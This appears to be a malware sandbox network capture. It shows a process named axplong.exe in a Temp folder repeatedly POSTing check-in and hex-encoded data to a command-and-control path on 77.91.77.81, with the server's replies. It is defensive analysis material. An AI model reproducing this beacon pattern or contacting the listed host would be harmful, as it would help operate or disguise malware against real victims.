                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  106192.168.2.44984577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:52.206867933 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:52.912319899 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  107192.168.2.44984677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:52.925648928 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:53.633696079 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  108192.168.2.44984777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:53.751408100 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:54.469104052 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  109192.168.2.44984877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:54.481518984 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:55.194427967 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  110192.168.2.44984977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:55.314095020 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:56.034920931 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  111192.168.2.44985077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:56.046886921 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:56.745032072 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  112192.168.2.44985177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:56.860356092 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:57.561031103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  113192.168.2.44985277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:57.572587967 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:58.286354065 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  114192.168.2.44985377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:58.406438112 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:59.105396986 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  115192.168.2.44985477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:59.121865988 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:59.842470884 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  116192.168.2.44985577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:59.957547903 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:00.665925980 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  117192.168.2.44985677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:00.679071903 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:01.376832008 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  118192.168.2.44985777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:01.535721064 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:02.251619101 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:27:02.443206072 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:02.666754961 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  119192.168.2.44985877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:02.797461033 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:03.503354073 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  120192.168.2.44985977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:03.513945103 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:04.203516006 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  121192.168.2.44986077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:04.328504086 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:05.041497946 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  122192.168.2.44986177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:05.051107883 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:05.762242079 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  123192.168.2.44986277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:05.874900103 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:06.573016882 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  124192.168.2.44986377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:06.582987070 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:07.275258064 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  125192.168.2.44986477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:07.391180992 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  126192.168.2.44986577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:07.407612085 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:27:08.113143921 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  127192.168.2.44986677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:27:08.242755890 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:27:08.958517075 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:27:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


